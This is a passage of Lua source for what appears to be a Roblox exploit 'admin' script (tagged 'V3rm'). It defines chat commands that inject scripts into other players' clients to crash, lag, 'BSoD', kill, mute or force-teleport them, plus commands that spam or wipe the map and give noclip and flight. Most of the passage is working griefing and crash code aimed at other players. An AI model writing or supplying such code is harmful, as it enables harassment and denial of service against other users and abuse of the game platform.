  949. end
  950. end)
  951.  
  952. AddCmd("Force shutdown","fsd","Forces shutdown with a ManualSurfaceJoint",
  953. function(nothing, msg)
  954. NewS([[local b = Instance.new ("ManualSurfaceJointInstance",Workspace)]],workspace)
  955. end
  956. )
  957.  
  958. AddCmd("Message","m","Show a message",
  959. function(nothing, msg)
  960. if found then
  961. NewS([[
  962. a = Instance.new("Message", workspace)
  963. msg = "]]..msg..[["
  964. msg = msg:gsub("","\5")
  965. game:service'Debris':AddItem(a, 5)
  966. while wait() do
  967. for i = 30,0,-1 do
  968. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  969. wait()
  970. end
  971. for i = 0,30,1 do
  972. a.Text = "-->"..string.rep(" ",i)..msg..string.rep(" ",i).."<--"
  973. wait()
  974. end
  975. end
  976. ]], workspace)
  977. end
  978. end
  979. )
  980.  
  981. AddCmd("Create base","base","Create the base",
  982. function()
  983. a = Instance.new("Part")
  984. a.Parent = Workspace
  985. a.Name = "Base"
  986. a.Position = Vector3.new(0, 0.6, 0)
  987. a.Size = Vector3.new(1002, 0, 1002)
  988. a.Material = "Grass"
  989. a.Anchored = true
  990. a.BrickColor = BrickColor.new("Dark green")
  991. end
  992. )
  993.  
  994. AddCmd("Ping","ping","Ping something",
  995. function(plrs, msg)
  996. if msg == "" then
  997. Output("pong", __)
  998. else
  999. Output(msg, __)
  1000. end
  1001. end
  1002. )
  1003.  
  1004. AddCmd("Dismiss","dt","Dismiss tabs",
  1005. function()
  1006. Dismiss()
  1007. end
  1008. )
  1009.  
  1010. AddCmd("God player","god","OYUS FULL HEALTH",
  1011. function(plrs)
  1012. for _, plr in pairs(plrs) do
  1013. if plr and plr.Character and plr.Character.Humanoid then
  1014. me = plr
  1015. select=Instance.new("SelectionBox",me.Character.Head)
  1016. select1=Instance.new("SelectionBox",me.Character.Torso)
  1017. select2=Instance.new("SelectionBox",me.Character["Right Arm"])
  1018. select3=Instance.new("SelectionBox",me.Character["Left Arm"])
  1019. select4=Instance.new("SelectionBox",me.Character["Left Leg"])
  1020. select5=Instance.new("SelectionBox",me.Character["Right Leg"])
  1021. select.Adornee=me.Character.Head
  1022. select1.Adornee=me.Character.Torso
  1023. select2.Adornee=me.Character["Right Arm"]
  1024. select3.Adornee=me.Character["Left Arm"]
  1025. select4.Adornee=me.Character["Left Leg"]
  1026. select5.Adornee=me.Character["Right Leg"]
  1027. me.Character.Humanoid.MaxHealth=math.huge
  1028. end
  1029. end
  1030. end
  1031. )
  1032.  
  1033. AddCmd("BSoD","bsod","BSoD a player",
  1034. function(Plrs)
  1035. for _, plr in pairs(Plrs) do
  1036. if plr and plr.Backpack then
  1037. for i = 0,7,1 do
  1038. NewLS(BSoDSource, plr.Backpack)
  1039. Output("You BSoD'D "..plr.Name, __)
  1040.  
  1041. end
  1042. end
  1043. end
  1044. end
  1045. )
  1046.  
  1047.  
  1048.  
  1049. AddCmd("Nilp","nils","see who is nil *BETA*",
  1050. function()
  1051. NewS([[
  1052. Model = Instance.new("Model", game.Lighting)
  1053. Model.Name = "V3rm Tabs"
  1054. for _,v in pairs(game:service'NetworkServer':children()) do
  1055. if v:GetPlayer() then
  1056. if v:GetPlayer().Parent ~= game:service'Players' then
  1057. Instance.new("StringValue",Model).Value = v:GetPlayer().Name
  1058. end
  1059. end
  1060. end
  1061. ]], workspace)
  1062. wait()
  1063. np = nil
  1064. for i = 0,5,1 do
  1065. if game.Lighting:findFirstChild("V3rm Tabs") then
  1066. np = game.Lighting:findFirstChild("V3rm Tabs")
  1067. break
  1068. end
  1069. wait(0.1)
  1070. end
  1071. if np ~= nil then
  1072. Dismiss()
  1073. for _,v in pairs(np:children()) do
  1074. if v:IsA("StringValue") then
  1075. Output(v.Value,"Really red")
  1076. end
  1077. end
  1078. elseif np == nil then
  1079. Output("Something went wrong.","Really red")
  1080. end
  1081. end
  1082. )
  1083.  
  1084. AddCmd("Probe mode", "probe", "temp nil",
  1085. function()
  1086. probemode = true
  1087. Dismiss()
  1088. if LocalPlayer.Character then LocalPlayer.Character = nil end
  1089. if workspace.CurrentCamera == nil then return end
  1090. local camera = workspace.CurrentCamera
  1091. local probe = Instance.new("Part", workspace)
  1092. probe.Shape = "Ball"
  1093. probe.Color = Color3.new(0, 255, 255)
  1094. probe.Anchored = true
  1095. probe.Transparency = (0.5)
  1096. probe.Size = Vector3.new(2, 2, 2)
  1097. probe.CanCollide = false
  1098.  
  1099. P.Color = Color3.new(170, 0, 255)
  1100.  
  1101. One = Instance.new("Decal", probe)
  1102. Two = Instance.new("Decal", probe)
  1103. Three = Instance.new("Decal", probe)
  1104. Four = Instance.new("Decal", probe)
  1105. Five = Instance.new("Decal", probe)
  1106. Six = Instance.new("Decal", probe)
  1107. One.Texture = "http://www.roblox.com/asset/?id=124865736"
  1108. Two.Texture = "http://www.roblox.com/asset/?id=124865736"
  1109. Three.Texture = "http://www.roblox.com/asset/?id=124865736"
  1110. Four.Texture = "http://www.roblox.com/asset/?id=124865736"
  1111. Five.Texture = "http://www.roblox.com/asset/?id=124865736"
  1112. Six.Texture = "http://www.roblox.com/asset/?id=124865736"
  1113. One.Face = "Front"
  1114. Two.Face = "Back"
  1115. Three.Face = "Right"
  1116. Four.Face = "Left"
  1117. Five.Face = "Top"
  1118. Six.Face = "Bottom"
  1119.  
  1120. local s = Instance.new("SelectionBox")
  1121.  
  1122. s.Color = BrickColor.new("Really black")
  1123. s.Adornee = probe
  1124. s.Parent = probe
  1125. s.Transparency = (0.4)
  1126. probe.TopSurface = 0
  1127. probe.Color = Color3.new(170, 0, 255)
  1128. probe.Anchored = true
  1129. probe.BottomSurface = 0
  1130. probe.Name = LocalPlayer.Name.."'s probe"
  1131. local rotation = 0
  1132. local bbg = Instance.new("BillboardGui", probe)
  1133. bbg.Size = UDim2.new(3, 0, 3 ,0)
  1134. bbg.ExtentsOffset = Vector3.new(0, 2, 0)
  1135. local txt = Instance.new("TextLabel", bbg)
  1136. txt.FontSize = "Size24"
  1137. txt.Font = "SourceSansBold"
  1138. txt.Text = LocalPlayer.Name
  1139. txt.BackgroundTransparency = 1
  1140. txt.TextColor3 = Color3.new(0, 255, 255)
  1141. txt.TextStrokeTransparency = 0
  1142. txt.Size = UDim2.new(1,0,1,0)
  1143. local pl = Instance.new("PointLight", probe)
  1144. pl.Shadows = true
  1145. pl.Range = 20
  1146. coroutine.wrap(function()
  1147. while pl ~= nil do
  1148. pl.Color = Color3.new(math.random(), math.random(), math.random())
  1149. wait(0.8)
  1150. end
  1151. end)()
  1152. coroutine.wrap(function()
  1153. while LocalPlayer.Character == nil and probe.Parent == workspace and probe ~= nil and game:service'RunService'.Stepped:wait() do
  1154. probe.CFrame = camera.Focus * CFrame.Angles(0, rotation, 0)
  1155. rotation = rotation + 0.1
  1156. end
  1157. if camera then
  1158. camera:Destroy()
  1159. end
  1160. probe:Destroy()
  1161. end)()
  1162. end
  1163. )
  1164.  
  1165.  
  1166. AddCmd("reload","char","Creates your character",
  1167. function()
  1168. if workspace.CurrentCamera == nil then return end
  1169. local camera = workspace.CurrentCamera
  1170. local new_char = game:service("InsertService"):LoadAsset(68452456):GetChildren()[1]
  1171. local human = new_char.Humanoid
  1172. human.Parent = nil
  1173. new_char.Name = LocalPlayer.Name
  1174. wait()
  1175. human.Parent = new_char
  1176. camera.CameraSubject = human
  1177. camera.CameraType = "Custom"
  1178. new_char.Parent = workspace
  1179. local pl = Instance.new("PointLight", new_char.Head)
  1180. pl.Range = 24
  1181. pl.Shadows = true
  1182. LocalPlayer.Character = new_char
  1183. new_char:MakeJoints()
  1184. new_char.Torso.BrickColor = torsocolor
  1185. new_char["Left Leg"].BrickColor = leftlegcolor
  1186. new_char["Right Leg"].BrickColor = rightlegcolor
  1187. new_char["Left Arm"].BrickColor = leftarmcolor
  1188. new_char["Right Arm"].BrickColor = rightarmcolor
  1189. new_char.Head.BrickColor = headcolor
  1190. for i,v in pairs(Clothes) do
  1191. v:Clone().Parent = new_char
  1192. end
  1193. probemode = false
  1194. end
  1195. )
  1196.  
  1197. AddCmd("stop plsplspls","vremove","Remove Admin",
  1198. function()
  1199. Output("y u remove dis",
  1200. function()
  1201. Output("fine...qq",
  1202. function()
  1203. for i,v in pairs(getfenv(1)) do
  1204. getfenv(1)[i] = nil
  1205. end
  1206. script.Disabled = true
  1207. LocalPlayer = NO_PLAYER
  1208. script:findFirstChild(SourceName).Value = " "
  1209. script.Disabled = true
  1210. V3rmModel:ClearAllChildren()
  1211. V3rmModel:Destroy()
  1212. connection:disconnect()
  1213. Tabs = {}
  1214. Cmds = {}
  1215. Banlist = {}
  1216. fukhed.all = true
  1217. coroutine.resume(coroutine.create(function()
  1218. while wait(0.1) do
  1219. Dismiss()
  1220. end
  1221. end))
  1222. end)
  1223. end)
  1224. end
  1225. )
  1226.  
  1227. AddCmd("ForceField","ff","Give forcefield to player",
  1228. function(plrs)
  1229. for _, plr in pairs(plrs) do
  1230. if plr and plr.Character then
  1231. Instance.new("ForceField", plr.Character)
  1232. end
  1233. end
  1234. end
  1235. )
  1236.  
  1237. function ShowBL()
  1238. Dismiss()
  1239. for _,v in pairs(Banlist) do
  1240. Output(v, "Really red", function()
  1241. Dismiss()
  1242. Output("Un-ban", "Black", function() table.remove(Banlist,_) end)
  1243. Output("Back", "Really red", function() ShowBL() end)
  1244. end)
  1245. end
  1246. end
  1247.  
  1248. AddCmd("Banlist","bl","Show banned players",
  1249. function()
  1250. ShowBL()
  1251. end
  1252. )
  1253.  
  1254. AddCmd("Lag player","lg","Lag a player",
  1255. function(plrs)
  1256. for _, plr in pairs(plrs) do
  1257. if plr and plr.Backpack then
  1258. NewLS(LagSource, plr.Backpack)
  1259. end
  1260. end
  1261. end
  1262. )
  1263.  
  1264. AddCmd("Crash player","crash","Crash the player",
  1265. function(plrs)
  1266. for _, plr in pairs(plrs) do
  1267. if plr and plr.Backpack then
  1268. NewLS([==[
  1269. game:GetService("RunService").RenderStepped(function()
  1270. Delay(0, function() return end)
  1271. end)]==], plr.Backpack)
  1272. end
  1273. end
  1274. end
  1275. )
  1276.  
  1277. AddCmd("Kill player","kill","Kill a player",
  1278. function(plrs)
  1279. for _, plr in pairs(plrs) do
  1280. if plr and plr.Character then
  1281. plr.Character:BreakJoints()
  1282. end
  1283. end
  1284. end
  1285. )
  1286.  
  1287.  
  1288. AddCmd("Respawn player","respawn","Respawn the player",
  1289. function(plrs)
  1290. for _, plr in pairs(plrs) do
  1291. NewS("game.Players['"..plr.Name.."']:LoadCharacter()", workspace)
  1292. end
  1293. end
  1294. )
  1295.  
  1296. AddCmd("Mute player","mute","Block the player chat",
  1297. function(plrs)
  1298. for _, plr in pairs(plrs) do
  1299. if plr and plr.Backpack then
  1300. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, false)", plr.Backpack)
  1301. end
  1302. end
  1303. end
  1304. )
  1305.  
  1306. AddCmd("Unmute player","unmute","Unblock the player chat",
  1307. function(plrs)
  1308. for _, plr in pairs(plrs) do
  1309. if plr and plr.Backpack then
  1310. NewLS("game:service'StarterGui':SetCoreGuiEnabled(3, true)", plr.Backpack)
  1311. end
  1312. end
  1313. end
  1314. )
  1315.  
  1316. AddCmd("Un-ForceField","unff","Remove the forcefield that you gave to player",
  1317. function(plrs)
  1318. for _, plr in pairs(plrs) do
  1319. if plr and plr.Character then
  1320. pcall(function()
  1321. for _,v in pairs(plr.Character:GetChildren()) do
  1322. if v:IsA("ForceField") then
  1323. v:Destroy()
  1324. end
  1325. end
  1326. end)
  1327. end
  1328. end
  1329. end
  1330. )
  1331.  
  1332. AddCmd("Bsod Spam","dsz","Make everything bsod",
  1333. function()
  1334. function meands(obj)
  1335. for i,v in pairs(obj:GetChildren()) do
  1336. if v:IsA("BasePart") then
  1337. One = Instance.new("Decal", v)
  1338. Two = Instance.new("Decal", v)
  1339. Three = Instance.new("Decal", v)
  1340. Four = Instance.new("Decal", v)
  1341. Five = Instance.new("Decal", v)
  1342. Six = Instance.new("Decal", v)
  1343. One.Texture = "http://www.roblox.com/asset/?id=3529576"
  1344. Two.Texture = "http://www.roblox.com/asset/?id=3529576"
  1345. Three.Texture = "http://www.roblox.com/asset/?id=3529576"
  1346. Four.Texture = "http://www.roblox.com/asset/?id=3529576"
  1347. Five.Texture = "http://www.roblox.com/asset/?id=3529576"
  1348. Six.Texture = "http://www.roblox.com/asset/?id=3529576"
  1349. One.Face = "Front"
  1350. Two.Face = "Back"
  1351. Three.Face = "Right"
  1352. Four.Face = "Left"
  1353. Five.Face = "Top"
  1354. Six.Face = "Bottom"
  1355. end
  1356. meands(v)
  1357. end
  1358. end
  1359. meands(workspace)
  1360. end
  1361. )
  1362.  
  1363. AddCmd("Decal Spam","ds","Make everything decal",
  1364. function()
  1365. function meands(obj)
  1366. for i,v in pairs(obj:GetChildren()) do
  1367. if v:IsA("BasePart") then
  1368. One = Instance.new("Decal", v)
  1369. Two = Instance.new("Decal", v)
  1370. Three = Instance.new("Decal", v)
  1371. Four = Instance.new("Decal", v)
  1372. Five = Instance.new("Decal", v)
  1373. Six = Instance.new("Decal", v)
  1374. One.Texture = "http://www.roblox.com/asset/?id=124865736"
  1375. Two.Texture = "http://www.roblox.com/asset/?id=124865736"
  1376. Three.Texture = "http://www.roblox.com/asset/?id=124865736"
  1377. Four.Texture = "http://www.roblox.com/asset/?id=124865736"
  1378. Five.Texture = "http://www.roblox.com/asset/?id=124865736"
  1379. Six.Texture = "http://www.roblox.com/asset/?id=124865736"
  1380. One.Face = "Front"
  1381. Two.Face = "Back"
  1382. Three.Face = "Right"
  1383. Four.Face = "Left"
  1384. Five.Face = "Top"
  1385. Six.Face = "Bottom"
  1386. local s = Instance.new("SelectionBox")
  1387. s.Color = BrickColor.random()
  1388. s.Adornee = v
  1389. s.Parent = v
  1390. s.Transparency = (0.4)
  1391. end
  1392. meands(v)
  1393. end
  1394. end
  1395. meands(workspace)
  1396. end
  1397. )
  1398.  
  1399. AddCmd("brick spam all","bs","Brick Spam da game",
  1400. function()
  1401. while true do
  1402. wait()
  1403. p = Instance.new("Part")
  1404. p.Size = Vector3.new(math.random(1,30),math.random(1,30),math.random(1,30))
  1405. p.BrickColor = BrickColor.random()
  1406. p.Position = Vector3.new(math.random(-200,200),100,math.random(-200,200))
  1407. p.Reflectance = (math.random(0,100) / 100)
  1408. p.Locked = false
  1409. p.Name = "V3rmilli0n was here"
  1410. p.Parent = game.Workspace
  1411. One = Instance.new("Decal", p)
  1412. Two = Instance.new("Decal", p)
  1413. Three = Instance.new("Decal", p)
  1414. Four = Instance.new("Decal", p)
  1415. Five = Instance.new("Decal", p)
  1416. Six = Instance.new("Decal", p)
  1417. One.Texture = "http://www.roblox.com/asset/?id=124865736"
  1418. Two.Texture = "http://www.roblox.com/asset/?id=124865736"
  1419. Three.Texture = "http://www.roblox.com/asset/?id=124865736"
  1420. Four.Texture = "http://www.roblox.com/asset/?id=124865736"
  1421. Five.Texture = "http://www.roblox.com/asset/?id=124865736"
  1422. Six.Texture = "http://www.roblox.com/asset/?id=124865736"
  1423. One.Face = "Front"
  1424. Two.Face = "Back"
  1425. Three.Face = "Right"
  1426. Four.Face = "Left"
  1427. Five.Face = "Top"
  1428. Six.Face = "Bottom"
  1429.  
  1430. local s = Instance.new("SelectionBox")
  1431.  
  1432. s.Color = BrickColor.random()
  1433. s.Adornee = p
  1434. s.Parent = p
  1435. s.Transparency = (0.4)
  1436. end
  1437. end
  1438. )
  1439.  
  1440. AddCmd("FClean","fclean","Fully clear",
  1441. function()
  1442. for i,s in pairs(workspace:GetChildren()) do
  1443. if game:GetService("Players"):GetPlayerFromCharacter(s) == nil then
  1444. if s.className ~= "Terrain" then
  1445. if s.className ~= "Camera" then
  1446. pcall(function() s:Destroy() end)
  1447. end end end end
  1448. local b = Instance.new("Part", Game:GetService("Workspace"))
  1449. b.Size = Vector3.new(3000, 1, 3000)
  1450. b.CFrame = CFrame.new(0, 0, 0)
  1451. b.Name = "Base"
  1452. b.BrickColor = BrickColor.new("Earth green")
  1453. b.TopSurface = "Smooth"
  1454. b.BottomSurface = "Smooth"
  1455. b.LeftSurface = "Smooth"
  1456. b.RightSurface = "Smooth"
  1457. b.FrontSurface = "Smooth"
  1458. b.BackSurface = "Smooth"
  1459. b.Anchored = true
  1460. b.Locked = true
  1461. local sl = Instance.new("SpawnLocation", workspace)
  1462. sl.Anchored = true
  1463. sl.Locked = true
  1464. sl.formFactor = "Plate"
  1465. sl.Size = Vector3.new(6, 0.4, 6)
  1466. sl.CFrame = CFrame.new(0, 0.6, 0)
  1467. sl.BrickColor = BrickColor.new("Really blue")
  1468. sl.TopSurface = "Smooth"
  1469. sl.BottomSurface = "Smooth"
  1470. sl.LeftSurface = "Smooth"
  1471. sl.RightSurface = "Smooth"
  1472. sl.FrontSurface = "Smooth"
  1473. sl.BackSurface = "Smooth"
  1474. game.Lighting.FogEnd = 10011111111
  1475. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1476. game.Lighting.TimeOfDay = "14:00:00"
  1477. game.Lighting.Ambient = Color3.new(0.5,0.5,0.5)
  1478. game.Lighting.Brightness = 1
  1479. game.Lighting.ColorShift_Bottom = Color3.new(0,0,0)
  1480. game.Lighting.ColorShift_Top = Color3.new(0,0,0)
  1481. game.Lighting.ShadowColor = Color3.new(0.7,0.7,0.7)
  1482. end
  1483. )
  1484.  
  1485.  
  1486. AddCmd("BSoD BanList","bbl","Show BSod banned players",
  1487. function()
  1488. Showbb()
  1489. end
  1490. )
  1491.  
  1492. AddCmd("'BSoD' ban","bb","BSoD ban a player",
  1493. function(plrs, msg)
  1494. for _,v in pairs(plrs) do
  1495. if v then
  1496. table.insert(BSoDBanList,v.Name)
  1497. Output('|BSoD Banned | '..v.Name,__)
  1498. for _, plr in pairs(plrs) do
  1499. if plr and plr.Backpack then
  1500. NewLS(BSoDSource, plr.Backpack)
  1501. else
  1502. Output(Error)
  1503. end
  1504. end
  1505. end
  1506. end
  1507. end
  1508. )
  1509.  
  1510. function Showbb()
  1511. Dismiss()
  1512. for _,v in pairs(BSoDBanList) do
  1513. Output(v,nil, function()
  1514. Dismiss()
  1515. Output(v)
  1516. Output("Un-Ban","Really red", function()
  1517. table.remove(BSoDBanList, _)
  1518. end)
  1519. Output("Back","Really red", function()
  1520. Showbb()
  1521. end)
  1522. end)
  1523. end
  1524. end
  1525.  
  1526. AddCmd("Number of commands","ncmds","0var 9000 qq not rlly soon tho",
  1527. function()
  1528. Output(#Cmds, __)
  1529. end
  1530. )
  1531.  
  1532.  
  1533.  
  1534. AddCmd("GetAge","ga","Get age of a player",
  1535. function(Plrs)
  1536. for _, plr in pairs(Plrs) do
  1537. if plr then
  1538. Output(plr.Name..": "..tostring(plr.AccountAge))
  1539. end
  1540. end
  1541. end)
  1542.  
  1543.  
  1544. AddCmd("StampTools","stools","StamperTools lel",
  1545. function()
  1546. x = game:GetService("InsertService"):LoadAsset(73089166) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1547. x = game:GetService("InsertService"):LoadAsset(73089204) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1548. x = game:GetService("InsertService"):LoadAsset(73089190) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1549. x = game:GetService("InsertService"):LoadAsset(58880579) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1550. x = game:GetService("InsertService"):LoadAsset(60791062) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1551. x = game:GetService("InsertService"):LoadAsset(73089239) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1552. end
  1553. )
  1554. AddCmd("md-Map Disintegrate","md","Map Disintegrate",
  1555. function()
  1556. game.Players.LocalPlayer.Character=nil
  1557. wait(.1)
  1558. function FindStuff(where)
  1559. for i,v in pairs(where:GetChildren()) do
  1560. if v:IsA("Part") or v:IsA("BasePart") then
  1561. s=Instance.new("SelectionBox")
  1562. s.Parent=v
  1563. s.Adornee=v
  1564. v.BrickColor=BrickColor.new("Really red")
  1565. v.Anchored=false
  1566. v:BreakJoints()
  1567. v.CanCollide=false
  1568. wait()
  1569. else
  1570. end
  1571. FindStuff(v)
  1572. end
  1573. end
  1574. FindStuff(game.Workspace)
  1575. FindStuff(game.Workspace)
  1576. end
  1577. )
  1578.  
  1579.  
  1580. AddCmd("nclip","nclip","noclip",
  1581. function()
  1582. repeat wait(1/44) until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Humanoid") and game.Players.LocalPlayer.Character:findFirstChild("Torso") and game.Players.LocalPlayer:GetMouse() and game.Workspace.CurrentCamera local mouse = game.Players.LocalPlayer:GetMouse() local torso = game.Players.LocalPlayer.Character.Torso local dir = {w = 0, s = 0, a = 0, d = 0} local spd = 2 mouse.KeyDown:connect(function(key) if key:lower() == "w" then dir.w = 1 elseif key:lower() == "s" then dir.s = 1 elseif key:lower() == "a" then dir.a = 1 elseif key:lower() == "d" then dir.d = 1 elseif key:lower() == "q" then spd = spd + 1 elseif key:lower() == "e" then spd = spd - 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then dir.w = 0 elseif key:lower() == "s" then dir.s = 0 elseif key:lower() == "a" then dir.a = 0 elseif key:lower() == "d" then dir.d = 0 end end) torso.Anchored = true game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true game.Players.LocalPlayer.Character.Humanoid.Changed:connect(function() game.Players.LocalPlayer.Character.Humanoid.PlatformStand = true end) repeat wait(1/44) torso.CFrame = CFrame.new(torso.Position, game.Workspace.CurrentCamera.CoordinateFrame.p) * CFrame.Angles(0,math.rad(180),0) * CFrame.new((dir.d-dir.a)*spd,0,(dir.s-dir.w)*spd) until nil
  1583. end
  1584. )
  1585.  
  1586. AddCmd("Fly","fly","fly lel",
  1587. function()
  1588. local mouse = game.Players.LocalPlayer:GetMouse()
  1589. repeat wait() until mouse
  1590. local plr = game.Players.LocalPlayer
  1591. local torso = plr.Character.Torso
  1592. local flying = true
  1593. local deb = true
  1594. local ctrl = {f = 0, b = 0, l = 0, r = 0}
  1595. local lastctrl = {f = 0, b = 0, l = 0, r = 0}
  1596. local maxspeed = 50
  1597. local speed = 0
  1598. function Fly()
  1599. local bg = Instance.new("BodyGyro", torso)
  1600. bg.P = 9e4
  1601. bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  1602. bg.cframe = torso.CFrame
  1603. local bv = Instance.new("BodyVelocity", torso)
  1604. bv.velocity = Vector3.new(0,0.1,0)
  1605. bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
  1606. repeat wait()
  1607. plr.Character.Humanoid.PlatformStand = true
  1608. if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then
  1609. speed = speed+.5+(speed/maxspeed)
  1610. if speed > maxspeed then
  1611. speed = maxspeed
  1612. end
  1613. elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then
  1614. speed = speed-1
  1615. if speed < 0 then
  1616. speed = 0
  1617. end
  1618. end
  1619. if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then
  1620. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  1621. lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
  1622. elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then
  1623. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  1624. else
  1625. bv.velocity = Vector3.new(0,0.1,0)
  1626. end
  1627. bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
  1628. until not flying
  1629. ctrl = {f = 0, b = 0, l = 0, r = 0}
  1630. lastctrl = {f = 0, b = 0, l = 0, r = 0}
  1631. speed = 0
  1632. bg:Destroy()
  1633. bv:Destroy()
  1634. plr.Character.Humanoid.PlatformStand = false
  1635. end
  1636. mouse.KeyDown:connect(function(key)
  1637. if key:lower() == "e" then
  1638. if flying then flying = false
  1639. else
  1640. flying = true
  1641. Fly()
  1642. end
  1643. elseif key:lower() == "w" then
  1644. ctrl.f = 1
  1645. elseif key:lower() == "s" then
  1646. ctrl.b = -1
  1647. elseif key:lower() == "a" then
  1648. ctrl.l = -1
  1649. elseif key:lower() == "d" then
  1650. ctrl.r = 1
  1651. end
  1652. end)
  1653. mouse.KeyUp:connect(function(key)
  1654. if key:lower() == "w" then
  1655. ctrl.f = 0
  1656. elseif key:lower() == "s" then
  1657. ctrl.b = 0
  1658. elseif key:lower() == "a" then
  1659. ctrl.l = 0
  1660. elseif key:lower() == "d" then
  1661. ctrl.r = 0
  1662. end
  1663. end)
  1664. Fly()
  1665. end
  1666. )
  1667.  
  1668. AddCmd("ek","ek","Epic Katana lel",
  1669. function()
  1670. x = game:GetService("InsertService"):LoadAsset(18017365) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1671. x = game:GetService("InsertService"):LoadAsset(21294489) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1672. x = game:GetService("InsertService"):LoadAsset(18776718) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1673. x = game:GetService("InsertService"):LoadAsset(20577851) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1674. x = game:GetService("InsertService"):LoadAsset(25545089) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1675. x = game:GetService("InsertService"):LoadAsset(22787168) x.Parent = game.Workspace x:makeJoints() x:MoveTo(game.Players.LocalPlayer.Character.Head.Position)
  1676. end
  1677. )
  1678.  
  1679. AddCmd("Teleport","tp","Teleport a player to a place",
  1680. function(plrs, msg)
  1681. local keypos = msg:find(key)
  1682. local targPlayers = msg:sub(1,keypos-1)
  1683. local plrs = getPlayers(targPlayers)
  1684. local id = msg:sub(tonumber(keypos+1))
  1685. for _,v in pairs(plrs) do
  1686. if v and v.Backpack then
  1687. NewLS([[game:service'TeleportService':Teleport(]]..id..[[)]], v.Backpack)
  1688. end
  1689. end
  1690. end
  1691. )
  1692.  
  1693.  
  1694. function Output(Txt, func)
  1695. P = Instance.new("Part", V3rmModel)
  1696. P.Shape = "Block"
  1697. P.Color = Color3.new(27, 42, 53)
  1698. P.Anchored = true
  1699. P.Transparency = (0.4)
  1700. P.Size = Vector3.new(2, 3, 2)
  1701. P.CanCollide = false
  1702. P.TopSurface = "Smooth"
  1703.  
  1704. if probemode == false then
  1705. if LocalPlayer.Character.Torso then
  1706. P.Position = LocalPlayer.Character.Torso.Position
  1707. elseif LocalPlayer.Character.Torso == nil then return end
  1708. elseif probemode == true then
  1709. if game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") then
  1710. P.Position = game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe").Position
  1711. elseif game.Workspace:findFirstChild(LocalPlayer.Name.."'s probe") == nil then return end
  1712. else
  1713. return
  1714. end
  1715. local s = Instance.new("SelectionBox")
  1716. s.Color = BrickColor.new(27, 42, 53)
  1717. s.Adornee = P
  1718. s.Parent = P
  1719. s.Transparency = (0.4)
  1720. Instance.new("PointLight", P)
  1721. bg = Instance.new("BillboardGui", P)
  1722. bg.Adornee = tab
  1723. bg.Size = UDim2.new(8, 0, 7.5, 0)
  1724. bg.StudsOffset = Vector3.new(0, 1, 0)
  1725. text = Instance.new("TextLabel", bg)
  1726. text.Size = UDim2.new(1, 0, 0.2, 0)
  1727. text.FontSize = "Size18"
  1728. text.BackgroundTransparency = 1
  1729. text.Font = "Legacy"
  1730. text.TextStrokeTransparency = 0
  1731. text.TextColor3 = Color3.new(52,52,52)
  1732. text.Text = Txt
  1733. Click = Instance.new("ClickDetector",P)
  1734. Click.MaxActivationDistance = 999999999
  1735. Click.MouseClick:connect(function(Plr)
  1736. if Plr.Name == LocalPlayer.Name then
  1737. Dismiss()
  1738. func = func
  1739. func()
  1740. end
  1741. end)
  1742. table.insert(Tabs, P)
  1743. end
  1744.  
  1745. function getPlayers(msg)
  1746. local plrs = {}
  1747. if msg == "me" then
  1748. table.insert(plrs, LocalPlayer)
  1749. elseif msg == "all" then
  1750. plrs = game:GetService("Players"):GetChildren()
  1751. elseif msg == "noobs" then
  1752. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1753. if plr.AccountAge > 364 then
  1754. table.insert(plrs, plr)
  1755. end
  1756. end
  1757. elseif msg == "veterans" then
  1758. for _,plr in pairs(game:GetService("Players"):GetChildren()) do
  1759. if plr.AccountAge > 364 then
  1760. table.insert(plrs, plr)
  1761. end
  1762. end
  1763. elseif msg == "others" then
  1764. for i,v in pairs(game:GetService("Players"):GetChildren()) do
